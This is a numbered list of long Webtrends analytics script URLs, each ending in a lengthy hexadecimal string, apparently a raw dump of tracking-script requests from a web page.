11.14. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665

11.15. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5

11.16. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc

11.17. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d

11.18. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e

11.19. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1e3b05f9a6f0b729a85efe7adb7fb8cf8eeb771dec2619c6e66228f7e802013802a70bf96b1c3ea19d97efe93fa6fb5ea74b545b1f6369884864c85e279fd5377162ab5cbea2665ceb2710c2aa521889f65cb9f85acd62a48c188452f8d5108fcdb073538598989008ca7f0ba4af4581f6d4a79c2f7c47cdcd7a2552be91b374aea6f476ccb905aa5a3d174e1a634cdb980d9d601c589313678623d87457b45e1f1e908c61532f25e3f94f63afa3f6db67e7007a14a6b7c710a8b5a35e27a0d4500847f80c0ebda463bc83a8189dd1d23b44666c6f0e2e2369b2e8a5dffca9a56c2278975ad05350150d5070b4c817a7105f1cc36df9be0da376750cc8ef217352a0ba380bf9a922864fe1d879913aa3b5d337305caf06e6482e85fb331c3d8ef5b24887216825952132a3d35aff60551fb92a69724812ffe64c7bc44d9cda7109fff75ecdefc7a580b5b015be0a2

11.20. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4ecb5eeb972d0fb6d8c27392b8f1fe14354db7a22e4f3f981b902d46ff783e47cf9a720ab7f8ad51ef99c9e5cceaa79b91552041ad9a79a692b84e621103aca09edf9249ed2df83f71d59ccc62356fa5168f2ca0f3f315ffb890f88d686c03ff64f777d5e1bbf9db672ada4c41e75e97a7c7ecc5f7a55ffc64ec4e19639b7820eeab9c3979112afef38467e754391361e4e91e0fc13bf0049e4212e9f91559c63359c257a75a15c6b001172fe4937f705511341db39b094acc560169b6ac1d5ed1752b30b5cd5e8a69d429d698147daacb730cc29fc60d071411a29ce700554cc273d409ac55da6eb9eba491035a7fc9371495675d590c2e2ea0819f20efec52fbc6148654a40d0d5333cdee40bc237d290ef3a55ef0473ee3d3174415824f7e05046e588ffd272df35a074edad59ce95a73fdbfd338a84b97405441e3baacf2880b37eb38bc03b8ec6130e8355f13082f285830ae14702ba6d55

11.21. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4f3b2ecaa7b9787268975646c9a6fe12e0dc96b33e5d7f4cfbd4c8b3fb389ac31f4b33b877f9a9e0ab4c5dd1a85e935f84d0f311689f4c87061deb765416dd916a4be71979f8ec8a34c06da9f6274d60a23ad9b1c367b4c85fe0699df97c83df65c6967397bd9edd304b9bcca55469f091879db220e21c48056caf3e341ca810df1dfdb8f8301c58931200004259f201f4ae197f61db2733ce4275be9e72fe1683799230f74c1350a09710efe594ee36a14527ee7039bd0e2c96e0d9d79dacfed1f62fc3c4b92a5f0b96ec20fda11f8dbd256a346ef03c869240646c3700554e268690b9aa736bee58de6154f6dd68f837e5e5476d1fec1e9ec5f73f10cfac52fea671f394a47d58734548db45cc30ad0c0ab24408f351d9809504f3121249a963f2a9ff8cdf343932db86683f208910246bbe0

11.22. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dce594e3d0e60b235269895e7baf9502a736d5a84b81ecc7b695dddf3bf515e70b0f61e903d0620220ef995b6766604ecdc6f9cffa4ffef19e7d66baea70381de7df55cf37dbe731091e6cb6a3905f846911248595aff0b1f6f3cdbfe3ac30d9c4678e383536c316f12914894b6effc4f298ac54cb7e8293fd68f6a36780748b8600e6979e42ced92cbc2e742b189ed2de622c89f6711a25da45f7eb77c18d8497be4c1899d26a72dc1268f2931c41435eea87148ad684c83cff5d6d663078d1efc44cf2e303e28add

11.23. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29c9119cbec293c0d622b875d417cd18cb343d86f39e9542e91ed43fa6a22e9270074c2457c7a6f7d885f3ef87c0e45039908e9b4e1c61756cf4882f9b44c53e34700d5e8a69d54e50f995fbfbccd42df46ec12c17c571639b3606a4f9a72171192c33eabf899bf391631da8883685e0c3d908399b6b31904b650bd8315aa76147e2553c8915e7d80f265952595abbe344d9a610997284107317e59a3b0425eeb9ba191218221aa6f94bb40dcc1e9249cb774bf98ee7407217244aeec16ffd31ba080c2399fd00053ca13a163a0dea3c21fbe005fb9d10032105be4e1a267f21a6d327c62776a8fd1e687a80aec67ee1af4ed0e54af4f4eeec3f11307fd1f196b76867d6c3ce2cb04a55eb0d1bd080093f61802c730698566b99fbd06410a0371a3c5d0ecb5d4a62a86a51effaadb722705ff70b2911f1e9fe6dfeb180f7bc75bac0f70e8d4f717ae71c849b8fd7885af7cbac98053cfe672a0a206ef123ee1a389dbb537e637b82af0456b58f2f21e694e272e3b17ae8b4dac6e66c088819230b1b87b3bf767190709e232b65522d18aefb0cd28a343dd94806e46d85b59ab2735f94d709363d9d6c3740d2c822da5aeaef9d43f4def09ef3a3ab7f0f79ffffe0ba76ece1f931b46058afc36bc07c392f003d9d7b64b7b3f310816786a06f9cace8e1ec1ee2df9d7b272742c2d6b2f8497730a2341d5d1b5104b6e3cc7060ae8e5dc2b974608f86f949ca5e431439c67403cb3a96ff641869c533250de844f4333b65de07d8c0c6d60369e9283307caad2b3076aa574beba2c5c7877c112480c4a35e22b5c3359409cd1bbabcfb72eed138d2a0a7247d2e40b97a8bcac1fdd5d0578d1f5ea254a1447e6df13f3d309b9f4295cc03c2bd6dce17c9d7b4719e6fd142b3e0a873ca4a4ff739ff9679e39af46f80a30198a0132028a5bef72c9a8aeb75b401dd5937044febef7f5cf4b542529731555c8e1669fbcd66bbd1bb3be6ff0b35e620970dbd8af3e53a64b079e712ebdffab8e1287dfd1a058b7a2076df84ef6381d660411bcf39603779ce8aaad2a610b918f82136c57439bf9ebf439a0eaaa7f400dcfd3024409e7cd7280fb6f8e0944439466b3125200cfb7d03b6145c81982f5b012ec80ec6ab1b7d3ed65ff45ae954d6bbe27fa402ecedc2d9bd8420330ed097839576d2daafe311514b0a1ccc5036e963838572c5ed87b103b8fbdc73b97d004d99e6078b48df5e414fcd9020f0a903cadd733bb526a98e398b2537715cc02e2eaf75c692b7d9951da7333d6b7ebf495d591ac74954c5e98b33eab26d0029628cb

